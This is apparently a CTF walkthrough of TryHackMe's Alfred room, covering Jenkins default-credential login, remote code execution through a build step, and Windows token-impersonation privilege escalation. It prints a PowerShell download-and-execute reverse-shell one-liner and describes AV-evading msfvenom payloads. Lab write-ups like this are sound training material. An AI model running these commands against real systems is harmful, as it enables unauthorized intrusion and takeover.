Hello everyone I hope you are done well, in this post I will be sharing my walk through of TryHackMe's Alfred room. This was an easy windows machine where you would have to login into the admin portal by guessing the credential (which was quite simple) and then to find where you can execute system commands to get a reverse shell and from there seeing how you can escalate to SYSTEM.
Rustscan
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped syn-ack ttl 127
8080/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsPORT 80 (HTTP)
Here we don't see anything intersting so let's move to other http port
PORT 8080 (HTTP)
We can see jenkins login portal so let's try using the default credentials
admin:password
And it didn't work , let's try admin:admin
This worked are we are in, now we need to find where we can execute commands so we can get a reverse shell on the target machine
Hover over the project you'll get a dropdown menu
You'll have options like "Changes", "Workspace", "Build Now", "Delete Project"," Configure" and "Rename". Select `Configure`
Switch to Build Environment Tab
Here you can see there's a command written whoami so let's click on Apply and Save
Click on #2 then Console Ouput
And you can see what ever command we input there it will show the output so now what we can do is to host a powershell reverse shell script ,download it using powershell and execute the function in the script to get a shell
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-portStart your python3 http server
And our command will look like this , start a netcat listener
Now click on Build Now and that job will run and you'll get a shell
Generate a msfvenom payload with encoders to by pass AV
Host it on your local machine and download it by repeating the same method
Set up your metasploit listener
Execute the payload and you'll see a meterpreter session will be popped
Running the command getprivs we can see what privileges we have on the machine
Here we can escalate our privleges through SeImpersonatePrivilege
Run the command load icognito through this module we can impersonate tokens
Now even though we have SYSTEM on the machine but still we won't be able to access system files as it uses the primary token of the process and not the impersonated token so we need to migrate to a process running as SYSTEM which is services.exe
Then type shell to get a command prompt and navigate to C:\Windows\System32\config to get root flag.